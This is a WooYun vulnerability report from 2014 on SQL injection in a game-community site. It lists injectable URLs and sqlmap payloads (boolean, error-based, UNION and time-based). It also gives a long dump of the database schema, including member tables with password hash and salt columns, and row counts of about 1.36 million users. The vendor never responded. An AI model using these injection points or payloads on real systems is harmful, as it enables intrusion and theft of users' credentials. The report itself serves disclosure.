当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079716

漏洞标题:某游戏平台多处SQL注射导致136万用户信息泄漏

相关厂商:小小岛民俱乐部

漏洞作者: JsStack

提交时间:2014-10-17 12:09

修复时间:2014-12-01 12:12

公开时间:2014-12-01 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某游戏平台多处SQL注射导致136万用户信息泄漏

详细说明:

有效注入点有
www.xiaoxiaodaomin.com/space.php?do=gift&giftid=1&view=song giftid
www.xiaoxiaodaomin.com/space.php?do=anime&id=160&imgid=1&types=&view=cartoon_imagesview imgid
www.xiaoxiaodaomin.com/space.php?do=gift&order=nums&types=credit&userid=1&view=song userid
www.xiaoxiaodaomin.com/space.php?do=gift&types=beans&userid=1&view=song userid
www.xiaoxiaodaomin.com/space.php?do=pnotice&id=1 id
等等。还有很多,不一一贴出。
运行sql,查询发现有136万用户信息。一旦泄漏,后果严重

select count(*) from uc_members:    '1365276'
select count(*) from uchome_member:    '1364625'
select count(*) from ecs_users:    '1363243

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: giftid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: do=gift&giftid=1 AND 2302=2302&view=song
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: do=gift&giftid=1 AND (SELECT 1413 FROM(SELECT COUNT(*),CONCAT(0x7171736871,(SELECT (CASE WHEN (1413=1413) THEN 1 ELSE 0 END)),0x71636a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=song
    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: do=gift&giftid=1 UNION ALL SELECT CONCAT(0x7171736871,0x774e67676a7258744b54,0x71636a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=song
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: do=gift&giftid=1 AND SLEEP(5)&view=song
---
[10:13:20] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.17
back-end DBMS: MySQL 5.0


Database: islanderclub
Table: ecs_pay_log
[5 columns]
+--------------+------------------------+
| Column       | Type                   |
+--------------+------------------------+
| is_paid      | tinyint(1) unsigned    |
| log_id       | int(10) unsigned       |
| order_amount | decimal(10,2) unsigned |
| order_id     | mediumint(8) unsigned  |
| order_type   | tinyint(1) unsigned    |
+--------------+------------------------+
Database: islanderclub
Table: uchome_cats
[4 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| cid       | smallint(6)  |
| id        | smallint(6)  |
| name      | varchar(100) |
| sortorder | smallint(6)  |
+-----------+--------------+
Database: islanderclub
Table: uc_protectedmembers
[5 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| admin    | char(15)              |
| appid    | tinyint(1) unsigned   |
| dateline | int(10) unsigned      |
| uid      | mediumint(8) unsigned |
| username | char(15)              |
+----------+-----------------------+
Database: islanderclub
Table: uchome_myapp
[7 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| version       | mediumint(8) unsigned |
| appid         | mediumint(8) unsigned |
| appname       | varchar(60)           |
| displaymethod | tinyint(1)            |
| displayorder  | smallint(6) unsigned  |
| flag          | tinyint(1)            |
| narrow        | tinyint(1)            |
+---------------+-----------------------+
Database: islanderclub
Table: uchome_log
[3 columns]
+--------+-----------------------+
| Column | Type                  |
+--------+-----------------------+
| id     | mediumint(8) unsigned |
| idtype | char(20)              |
| logid  | mediumint(8) unsigned |
+--------+-----------------------+
Database: islanderclub
Table: uchome_tagblog
[2 columns]
+--------+-----------------------+
| Column | Type                  |
+--------+-----------------------+
| blogid | mediumint(8) unsigned |
| tagid  | mediumint(8) unsigned |
+--------+-----------------------+
Database: islanderclub
Table: uchome_network
[9 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| blogs  | varchar(250) |
| doings | varchar(250) |
| feeds  | varchar(250) |
| id     | smallint(6)  |
| mtags  | varchar(250) |
| pics   | varchar(250) |
| polls  | varchar(250) |
| shares | varchar(250) |
| stars  | text         |
+--------+--------------+
Database: islanderclub
Table: uc_failedlogins
[3 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| count      | tinyint(1) unsigned |
| ip         | char(15)            |
| lastupdate | int(10) unsigned    |
+------------+---------------------+
Database: islanderclub
Table: uchome_pic
[32 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| size         | int(10) unsigned      |
| albumid      | mediumint(8) unsigned |
| checkdate    | int(10)               |
| click_10     | smallint(6) unsigned  |
| click_6      | smallint(6) unsigned  |
| click_7      | smallint(6) unsigned  |
| click_8      | smallint(6) unsigned  |
| click_9      | smallint(6) unsigned  |
| dateline     | int(10) unsigned      |
| displayorder | int(10)               |
| filename     | varchar(100)          |
| filepath     | varchar(60)           |
| hot          | mediumint(8) unsigned |
| is_index     | tinyint(1)            |
| magicframe   | tinyint(6)            |
| picid        | mediumint(8)          |
| picthumb     | varchar(100)          |
| postip       | varchar(20)           |
| recommend    | tinyint(1)            |
| remote       | tinyint(1)            |
| star         | tinyint(1)            |
| star_time    | int(10)               |
| state        | tinyint(1)            |
| thumb        | tinyint(1)            |
| title        | varchar(255)          |
| topicid      | mediumint(8) unsigned |
| type         | varchar(20)           |
| uid          | mediumint(8) unsigned |
| username     | varchar(15)           |
| video        | varchar(500)          |
| votes        | int(10)               |
| xiu          | tinyint(1)            |
+--------------+-----------------------+
Database: islanderclub
Table: uchome_dati_question
[10 columns]
+---------------+---------+
| Column        | Type    |
+---------------+---------+
| correctanswer | int(11) |
| description   | text    |
| id            | int(11) |
| pack          | int(11) |
| privacy       | int(11) |
| question      | text    |
| score         | int(11) |
| status        | int(11) |
| type          | int(11) |
| vote          | int(11) |
+---------------+---------+
Database: islanderclub
Table: uchome_tag
[6 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| close    | tinyint(1)            |
| blognum  | smallint(6) unsigned  |
| dateline | int(10) unsigned      |
| tagid    | mediumint(8) unsigned |
| tagname  | char(30)              |
| uid      | mediumint(8) unsigned |
+----------+-----------------------+
Database: islanderclub
Table: uchome_pollfield
[7 columns]
+---------+-----------------------+
| Column  | Type                  |
+---------+-----------------------+
| option  | text                  |
| hotuser | text                  |
| invite  | text                  |
| message | text                  |
| notify  | tinyint(1)            |
| pid     | mediumint(8) unsigned |
| summary | text                  |
+---------+-----------------------+
Database: islanderclub
Table: ecs_back_goods
[11 columns]
+-------------+-----------------------+
| Column      | Type                  |
+-------------+-----------------------+
| back_id     | mediumint(8) unsigned |
| brand_name  | varchar(60)           |
| goods_attr  | text                  |
| goods_id    | mediumint(8) unsigned |
| goods_name  | varchar(120)          |
| goods_sn    | varchar(60)           |
| is_real     | tinyint(1) unsigned   |
| product_id  | mediumint(8) unsigned |
| product_sn  | varchar(60)           |
| rec_id      | mediumint(8) unsigned |
| send_number | smallint(5) unsigned  |
+-------------+-----------------------+
Database: islanderclub
Table: ecs_delivery_goods
[13 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| brand_name     | varchar(60)           |
| delivery_id    | mediumint(8) unsigned |
| extension_code | varchar(30)           |
| goods_attr     | text                  |
| goods_id       | mediumint(8) unsigned |
| goods_name     | varchar(120)          |
| goods_sn       | varchar(60)           |
| is_real        | tinyint(1) unsigned   |
| parent_id      | mediumint(8) unsigned |
| product_id     | mediumint(8) unsigned |
| product_sn     | varchar(60)           |
| rec_id         | mediumint(8) unsigned |
| send_number    | smallint(5) unsigned  |
+----------------+-----------------------+
Database: islanderclub
Table: uchome_topic
[14 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| dateline | int(10) unsigned      |
| endtime  | int(10) unsigned      |
| joingid  | varchar(255)          |
| joinnum  | mediumint(8) unsigned |
| jointype | varchar(255)          |
| lastpost | int(10) unsigned      |
| message  | mediumtext            |
| pic      | varchar(100)          |
| remote   | tinyint(1)            |
| subject  | varchar(80)           |
| thumb    | tinyint(1)            |
| topicid  | mediumint(8) unsigned |
| uid      | mediumint(8) unsigned |
| username | varchar(15)           |
+----------+-----------------------+
Database: islanderclub
Table: uchome_tuijian
[6 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| dateline | int(10)      |
| friends  | text         |
| goods_id | mediumint(8) |
| message  | text         |
| tjid     | mediumint(8) |
| uid      | mediumint(8) |
+----------+--------------+
Database: islanderclub
Table: uchome_dati
[14 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| answer     | varchar(100) |
| dateline   | int(10)      |
| datiid     | mediumint(8) |
| end_time   | int(10)      |
| qa         | varchar(100) |
| qb         | varchar(100) |
| qc         | varchar(100) |
| qd         | varchar(100) |
| qe         | varchar(100) |
| qf         | varchar(100) |
| start_time | int(10)      |
| state      | tinyint(1)   |
| subject    | varchar(100) |
| type       | varchar(100) |
+------------+--------------+
Database: islanderclub
Table: ecs_reg_extend_info
[4 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| content      | text                  |
| Id           | int(10) unsigned      |
| reg_field_id | int(10) unsigned      |
| user_id      | mediumint(8) unsigned |
+--------------+-----------------------+
Database: islanderclub
Table: uchome_cron
[11 columns]
+-----------+-----------------------+
| Column    | Type                  |
+-----------+-----------------------+
| day       | tinyint(2)            |
| hour      | tinyint(2)            |
| minute    | char(36)              |
| available | tinyint(1)            |
| cronid    | smallint(6) unsigned  |
| filename  | char(50)              |
| lastrun   | int(10) unsigned      |
| name      | char(50)              |
| nextrun   | int(10) unsigned      |
| type      | enum('user','system') |
| weekday   | tinyint(1)            |
+-----------+-----------------------+
Database: islanderclub
Table: uchome_gift
[19 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| best          | tinyint(1)   |
| dateline      | int(10)      |
| giftid        | mediumint(8) |
| is_best       | tinyint(1)   |
| limited       | int(10)      |
| limitnumber   | int(10)      |
| message       | text         |
| nums          | mediumint(8) |
| price         | smallint(6)  |
| subject       | varchar(100) |
| surl          | varchar(250) |
| surlbig       | varchar(250) |
| surlsmall     | varchar(250) |
| surlthumbnail | varchar(250) |
| thumb         | varchar(250) |
| thumb_old     | varchar(250) |
| type          | varchar(10)  |
| types         | varchar(20)  |
| uid           | mediumint(8) |
+---------------+--------------+
Database: islanderclub
Table: ecs_area_region
[2 columns]
+------------------+----------------------+
| Column           | Type                 |
+------------------+----------------------+
| region_id        | smallint(5) unsigned |
| shipping_area_id | smallint(5) unsigned |
+------------------+----------------------+
Database: islanderclub
Table: uc_t
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| id     | mediumint(8) |
| test   | varchar(250) |
+--------+--------------+
Database: islanderclub
Table: uchome_blacklist
[3 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| buid     | mediumint(8) unsigned |
| dateline | int(10) unsigned      |
| uid      | mediumint(8) unsigned |
+----------+-----------------------+
Database: islanderclub
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
+---------------+-----------------------+
Database: islanderclub
Table: uchome_class
[4 columns]
+-----------+-----------------------+
| Column    | Type                  |
+-----------+-----------------------+
| classid   | mediumint(8) unsigned |
| classname | char(40)              |
| dateline  | int(10) unsigned      |
| uid       | mediumint(8) unsigned |
+-----------+-----------------------+
Database: islanderclub
Table: sky_items
[7 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| account  | char(15)              |
| content  | varchar(255)          |
| dateline | int(10) unsigned      |
| digg     | mediumint(8) unsigned |
| itemid   | mediumint(8) unsigned |
| reply    | mediumint(5) unsigned |
| uid      | mediumint(8) unsigned |
+----------+-----------------------+
Database: islanderclub
Table: cob_ibook_serial
[11 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| click_count   | int(11)      |
| create_date   | datetime     |
| id            | int(11)      |
| like_count    | int(11)      |
| serial_cover  | int(11)      |
| serial_desc   | text         |
| serial_name   | varchar(255) |
| serial_pid    | int(11)      |
| serial_status | tinyint(1)   |
| serial_type   | varchar(10)  |
| tags          | varchar(255) |
+---------------+--------------+
Database: islanderclub
Table: uchome_session
[6 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| ip           | int(10) unsigned      |
| lastactivity | int(10) unsigned      |
| magichidden  | tinyint(1)            |
| password     | char(32)              |
| uid          | mediumint(8) unsigned |
| username     | char(15)              |
+--------------+-----------------------+
Database: islanderclub
Table: ecs_package_goods
[5 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| admin_id     | tinyint(3) unsigned   |
| goods_id     | mediumint(8) unsigned |
| goods_number | smallint(5) unsigned  |
| package_id   | mediumint(8) unsigned |
| product_id   | mediumint(8) unsigned |
+--------------+-----------------------+
Database: islanderclub
Table: uchome_favorite
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| dateline | int(10)      |
| fid      | mediumint(8) |
| id       | mediumint(8) |
| idtype   | varchar(20)  |
| uid      | mediumint(8) |
+----------+--------------+
Database: islanderclub
Table: uchome_click
[5 columns]
+--------------+----------------------+
| Column       | Type                 |
+--------------+----------------------+
| clickid      | smallint(6) unsigned |
| displayorder | tinyint(6) unsigned  |
| icon         | varchar(100)         |
| idtype       | varchar(15)          |
| name         | varchar(50)          |
+--------------+----------------------+
Database: islanderclub
Table: ecs_comment
[12 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| add_time     | int(10) unsigned      |
| comment_id   | int(10) unsigned      |
| comment_rank | tinyint(1) unsigned   |
| comment_type | tinyint(3) unsigned   |
| content      | text                  |
| email        | varchar(60)           |
| id_value     | mediumint(8) unsigned |
| ip_address   | varchar(15)           |
| parent_id    | int(10) unsigned      |
| status       | tinyint(3) unsigned   |
| user_id      | int(10) unsigned      |
| user_name    | varchar(60)           |
+--------------+-----------------------+
Database: islanderclub
Table: ecs_tag
[4 columns]
+-----------+-----------------------+
| Column    | Type                  |
+-----------+-----------------------+
| goods_id  | mediumint(8) unsigned |
| tag_id    | mediumint(8)          |
| tag_words | varchar(255)          |
| user_id   | mediumint(8) unsigned |
+-----------+-----------------------+
Database: islanderclub
Table: ecs_plugins
[5 columns]
+--------------+---------------------+
| Column       | Type                |
+--------------+---------------------+
| version      | varchar(10)         |
| assign       | tinyint(1) unsigned |
| code         | varchar(30)         |
| install_date | int(10) unsigned    |
| library      | varchar(255)        |
+--------------+---------------------+
Database: islanderclub
Table: ecs_exchange_goods
[4 columns]
+-------------------+-----------------------+
| Column            | Type                  |
+-------------------+-----------------------+
| exchange_integral | int(10) unsigned      |
| goods_id          | mediumint(8) unsigned |
| is_exchange       | tinyint(1) unsigned   |
| is_hot            | tinyint(1) unsigned   |
+-------------------+-----------------------+
Database: islanderclub
Table: ecs_admin_message
[9 columns]
+-------------+----------------------+
| Column      | Type                 |
+-------------+----------------------+
| deleted     | tinyint(1) unsigned  |
| message     | text                 |
| message_id  | smallint(5) unsigned |
| read_time   | int(11) unsigned     |
| readed      | tinyint(1) unsigned  |
| receiver_id | tinyint(3) unsigned  |
| sender_id   | tinyint(3) unsigned  |
| sent_time   | int(11) unsigned     |
| title       | varchar(150)         |
+-------------+----------------------+
Database: islanderclub
Table: sky_reply
[6 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| account  | varchar(15)           |
| content  | varchar(255)          |
| dateline | int(10) unsigned      |
| replyto  | mediumint(8) unsigned |
| rid      | mediumint(8)          |
| uid      | mediumint(8)          |
+----------+-----------------------+
Database: islanderclub
Table: cob_icartoon
[15 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| area           | varchar(255) |
| author         | varchar(255) |
| chapter        | varchar(255) |
| comment        | varchar(255) |
| create_date    | datetime     |
| hit_count      | int(11)      |
| id             | int(11)      |
| imageLink      | varchar(255) |
| is_over        | smallint(2)  |
| latest_chapter | varchar(255) |
| latest_date    | varchar(255) |
| latest_url     | varchar(255) |
| tag            | varchar(255) |
| title          | varchar(255) |
| viewLink       | varchar(255) |
+----------------+--------------+
Database: islanderclub
Table: ecs_feedback
[13 columns]
+-------------+-----------------------+
| Column      | Type                  |
+-------------+-----------------------+
| message_img | varchar(255)          |
| msg_area    | tinyint(1) unsigned   |
| msg_content | text                  |
| msg_id      | mediumint(8) unsigned |
| msg_status  | tinyint(1) unsigned   |
| msg_time    | int(10) unsigned      |
| msg_title   | varchar(200)          |
| msg_type    | tinyint(1) unsigned   |
| order_id    | int(11) unsigned      |
| parent_id   | mediumint(8) unsigned |
| user_email  | varchar(60)           |
| user_id     | mediumint(8) unsigned |
| user_name   | varchar(60)           |
+-------------+-----------------------+
Database: islanderclub
Table: uchome_friendlog
[4 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| action   | varchar(10)           |
| dateline | int(10) unsigned      |
| fuid     | mediumint(8) unsigned |
| uid      | mediumint(8) unsigned |
+----------+-----------------------+
Database: islanderclub
Table: ecs_reg_fields
[6 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| dis_order      | tinyint(3) unsigned |
| display        | tinyint(1) unsigned |
| id             | tinyint(3) unsigned |
| is_need        | tinyint(1) unsigned |
| reg_field_name | varchar(60)         |
| type           | tinyint(1) unsigned |
+----------------+---------------------+
Database: islanderclub
Table: uchome_task
[14 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| available    | tinyint(1)            |
| credit       | smallint(6)           |
| displayorder | smallint(6) unsigned  |
| endtime      | int(10) unsigned      |
| filename     | varchar(50)           |
| image        | varchar(150)          |
| maxnum       | mediumint(8) unsigned |
| name         | varchar(50)           |
| nexttime     | int(10) unsigned      |
| nexttype     | varchar(20)           |
| note         | text                  |
| num          | mediumint(8) unsigned |
| starttime    | int(10) unsigned      |
| taskid       | smallint(6) unsigned  |
+--------------+-----------------------+
Database: islanderclub
Table: uchome_friendguide
[4 columns]
+-----------+-----------------------+
| Column    | Type                  |
+-----------+-----------------------+
| fuid      | mediumint(8) unsigned |
| fusername | char(15)              |
| num       | smallint(6) unsigned  |
| uid       | mediumint(8) unsigned |
+-----------+-----------------------+
Database: islanderclub
Table: uchome_docomment
[9 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| dateline | int(10) unsigned      |
| doid     | mediumint(8) unsigned |
| grade    | smallint(6) unsigned  |
| id       | int(10) unsigned      |
| ip       | varchar(20)           |
| message  | text                  |
| uid      | mediumint(8) unsigned |
| upid     | int(10) unsigned      |
| username | varchar(15)           |
+----------+-----------------------+
Database: islanderclub
Table: uchome_share
[14 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| body_data      | text                  |
| body_general   | text                  |
| body_template  | text                  |
| dateline       | int(10) unsigned      |
| hot            | mediumint(8) unsigned |
| hotuser        | text                  |
| image          | varchar(255)          |
| image_link     | varchar(255)          |
| sid            | mediumint(8) unsigned |
| title_template | text                  |
| topicid        | mediumint(8) unsigned |
| type           | varchar(30)           |
| uid            | mediumint(8) unsigned |
| username       | varchar(15)           |
+----------------+-----------------------+
Database: islanderclub
Table: uc_memberfields
[2 columns]
+-----------+-----------------------+
| Column    | Type                  |
+-----------+-----------------------+
| blacklist | text                  |
| uid       | mediumint(8) unsigned |
+-----------+-----------------------+
Database: islanderclub
Table: uc_newpm
[1 column]
+--------+-----------------------+
| Column | Type                  |
+--------+-----------------------+
| uid    | mediumint(8) unsigned |
+--------+-----------------------+
Database: islanderclub
Table: ecs_goods_type
[4 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| attr_group | varchar(255)         |
| cat_id     | smallint(5) unsigned |
| cat_name   | varchar(60)          |
| enabled    | tinyint(1) unsigned  |
+------------+----------------------+
Database: islanderclub
Table: ecs_user_address
[15 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| address       | varchar(120)          |
| address_id    | mediumint(8) unsigned |
| address_name  | varchar(50)           |
| best_time     | varchar(120)          |
| city          | smallint(5)           |
| consignee     | varchar(60)           |
| country       | smallint(5)           |
| district      | smallint(5)           |
| email         | varchar(60)           |
| mobile        | varchar(60)           |
| province      | smallint(5)           |
| sign_building | varchar(120)          |
| tel           | varchar(60)           |
| user_id       | mediumint(8) unsigned |
| zipcode       | varchar(60)           |
+---------------+-----------------------+
Database: islanderclub
Table: uchome_appcreditlog
[8 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| appid    | mediumint(8) unsigned |
| appname  | varchar(60)           |
| credit   | mediumint(8) unsigned |
| dateline | int(10) unsigned      |
| logid    | mediumint(8) unsigned |
| note     | text                  |
| type     | tinyint(1)            |
| uid      | mediumint(8) unsigned |
+----------+-----------------------+
Database: islanderclub
Table: uchome_magic
[13 columns]
+---------------+----------------------+
| Column        | Type                 |
+---------------+----------------------+
| close         | tinyint(1)           |
| charge        | smallint(6) unsigned |
| custom        | text                 |
| description   | text                 |
| displayorder  | smallint(6) unsigned |
| experience    | smallint(6) unsigned |
| forbiddengid  | text                 |
| mid           | varchar(15)          |
| name          | varchar(30)          |
| providecount  | smallint(6) unsigned |
| provideperoid | int(10) unsigned     |
| usecount      | smallint(6) unsigned |
| useperoid     | int(10) unsigned     |
+---------------+----------------------+
Database: islanderclub
Table: uchome_news
[11 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| commentnum | int(10)      |
| dateline   | int(10)      |
| istop      | tinyint(1)   |
| message    | text         |
| newsid     | mediumint(8) |
| newstype   | tinyint(1)   |
| state      | tinyint(1)   |
| subject    | varchar(250) |
| thumb      | varchar(250) |
| uid        | mediumint(8) |
| viewnum    | int(10)      |
+------------+--------------+
Database: islanderclub
Table: ecs_crons
[16 columns]
+-------------+---------------------+
| Column      | Type                |
+-------------+---------------------+
| day         | tinyint(2)          |
| hour        | varchar(2)          |
| minute      | varchar(255)        |
| allow_ip    | varchar(100)        |
| alow_files  | varchar(255)        |
| cron_code   | varchar(20)         |
| cron_config | text                |
| cron_desc   | text                |
| cron_id     | tinyint(3) unsigned |
| cron_name   | varchar(120)        |
| cron_order  | tinyint(3) unsigned |
| enable      | tinyint(1)          |
| nextime     | int(10)             |
| run_once    | tinyint(1)          |
| thistime    | int(10)             |
| week        | varchar(1)          |
+-------------+---------------------+
Database: islanderclub
Table: ecs_shipping_area
[4 columns]
+--------------------+----------------------+
| Column             | Type                 |
+--------------------+----------------------+
| configure          | text                 |
| shipping_area_id   | smallint(5) unsigned |
| shipping_area_name | varchar(150)         |
| shipping_id        | tinyint(3) unsigned  |
+--------------------+----------------------+
Database: islanderclub
Table: uchome_adminsession
[4 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| dateline   | int(10) unsigned      |
| errorcount | tinyint(1)            |
| ip         | char(15)              |
| uid        | mediumint(8) unsigned |
+------------+-----------------------+
Database: islanderclub
Table: uchome_eventinvite
[6 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| dateline   | int(10) unsigned      |
| eventid    | mediumint(8) unsigned |
| touid      | mediumint(8) unsigned |
| tousername | char(15)              |
| uid        | mediumint(8) unsigned |
| username   | varchar(15)           |
+------------+-----------------------+
Database: islanderclub
Table: ecs_adsense
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| clicks  | int(10) unsigned |
| from_ad | smallint(5)      |
| referer | varchar(255)     |
+---------+------------------+
Database: islanderclub
Table: ecs_mail_templates
[8 columns]
+------------------+---------------------+
| Column           | Type                |
+------------------+---------------------+
| is_html          | tinyint(1) unsigned |
| last_modify      | int(10) unsigned    |
| last_send        | int(10) unsigned    |
| template_code    | varchar(30)         |
| template_content | text                |
| template_id      | tinyint(1) unsigned |
| template_subject | varchar(200)        |
| type             | varchar(10)         |
+------------------+---------------------+
Database: islanderclub
Table: uchome_statuser
[3 columns]
+---------+-----------------------+
| Column  | Type                  |
+---------+-----------------------+
| daytime | int(10) unsigned      |
| type    | char(20)              |
| uid     | mediumint(8) unsigned |
+---------+-----------------------+
Database: islanderclub
Table: ecs_vote
[6 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| can_multi  | tinyint(1) unsigned  |
| end_time   | int(11) unsigned     |
| start_time | int(11) unsigned     |
| vote_count | int(10) unsigned     |
| vote_id    | smallint(5) unsigned |
| vote_name  | varchar(250)         |
+------------+----------------------+
Database: islanderclub
Table: ecs_brand
[7 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| brand_desc | text                 |
| brand_id   | smallint(5) unsigned |
| brand_logo | varchar(80)          |
| brand_name | varchar(60)          |
| is_show    | tinyint(1) unsigned  |
| site_url   | varchar(255)         |
| sort_order | tinyint(3) unsigned  |
+------------+----------------------+
Database: islanderclub
Table: uchome_magicinlog
[9 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| count    | smallint(6) unsigned  |
| credit   | smallint(6) unsigned  |
| dateline | int(10)               |
| fromid   | mediumint(8) unsigned |
| logid    | mediumint(8) unsigned |
| mid      | varchar(15)           |
| type     | tinyint(3) unsigned   |
| uid      | mediumint(8) unsigned |
| username | varchar(15)           |
+----------+-----------------------+
Database: islanderclub
Table: ecs_goods_cat
[2 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| cat_id   | smallint(5) unsigned  |
| goods_id | mediumint(8) unsigned |
+----------+-----------------------+
Database: islanderclub
Table: ecs_ad_position
[6 columns]
+----------------+----------------------+
| Column         | Type                 |
+----------------+----------------------+
| ad_height      | smallint(5) unsigned |
| ad_width       | smallint(5) unsigned |
| position_desc  | varchar(255)         |
| position_id    | tinyint(3) unsigned  |
| position_name  | varchar(60)          |
| position_style | text                 |
+----------------+----------------------+
Database: islanderclub
Table: ecs_payment
[10 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| enabled    | tinyint(1) unsigned |
| is_cod     | tinyint(1) unsigned |
| is_online  | tinyint(1) unsigned |
| pay_code   | varchar(20)         |
| pay_config | text                |
| pay_desc   | text                |
| pay_fee    | varchar(10)         |
| pay_id     | tinyint(3) unsigned |
| pay_name   | varchar(120)        |
| pay_order  | tinyint(3) unsigned |
+------------+---------------------+
Database: islanderclub
Table: uchome_dati_log
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| cuo      | smallint(4)  |
| dateline | int(10)      |
| datiid   | mediumint(8) |
| datikey  | varchar(250) |
| datival  | varchar(250) |
| dui      | smallint(4)  |
| id       | mediumint(8) |
| uid      | mediumint(8) |
+----------+--------------+
Database: islanderclub
Table: schema_migrations
[1 column]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| version | varchar(255) |
+---------+--------------+
Database: islanderclub
Table: uchome_clickuser
[6 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| clickid  | smallint(6) unsigned  |
| dateline | int(10) unsigned      |
| id       | mediumint(8) unsigned |
| idtype   | varchar(15)           |
| uid      | mediumint(8) unsigned |
| username | varchar(15)           |
+----------+-----------------------+
Database: islanderclub
Table: uchome_xiu_log
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| module   | varchar(100) |
| dateline | varchar(100) |
| id       | int(10)      |
| uid      | mediumint(8) |
| valueid  | mediumint(8) |
+----------+--------------+
Database: islanderclub
Table: uc_admins
[14 columns]
+-------------------+-----------------------+
| Column            | Type                  |
+-------------------+-----------------------+
| allowadminapp     | tinyint(1)            |
| allowadminbadword | tinyint(1)            |
| allowadmincache   | tinyint(1)            |
| allowadmincredits | tinyint(1)            |
| allowadmindb      | tinyint(1)            |
| allowadmindomain  | tinyint(1)            |
| allowadminlog     | tinyint(1)            |
| allowadminnote    | tinyint(1)            |
| allowadminpm      | tinyint(1)            |
| allowadminsetting | tinyint(1)            |
| allowadmintag     | tinyint(1)            |
| allowadminuser    | tinyint(1)            |
| uid               | mediumint(8) unsigned |
| username          | char(15)              |
+-------------------+-----------------------+
Database: islanderclub
Table: uchome_creditrule
[11 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| action     | char(20)              |
| credit     | mediumint(8) unsigned |
| cycletime  | int(10)               |
| cycletype  | tinyint(1)            |
| exp        | mediumint(8) unsigned |
| experience | mediumint(8) unsigned |
| norepeat   | tinyint(1)            |
| rewardnum  | tinyint(2)            |
| rewardtype | tinyint(1)            |
| rid        | mediumint(8) unsigned |
| rulename   | char(20)              |
+------------+-------------------


select count(*) from uc_members:    '1365276'
select count(*) from uchome_member:    '1364625'
select count(*) from ecs_users:    '1363243

修复方案:

版权声明:转载请注明来源 JsStack@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论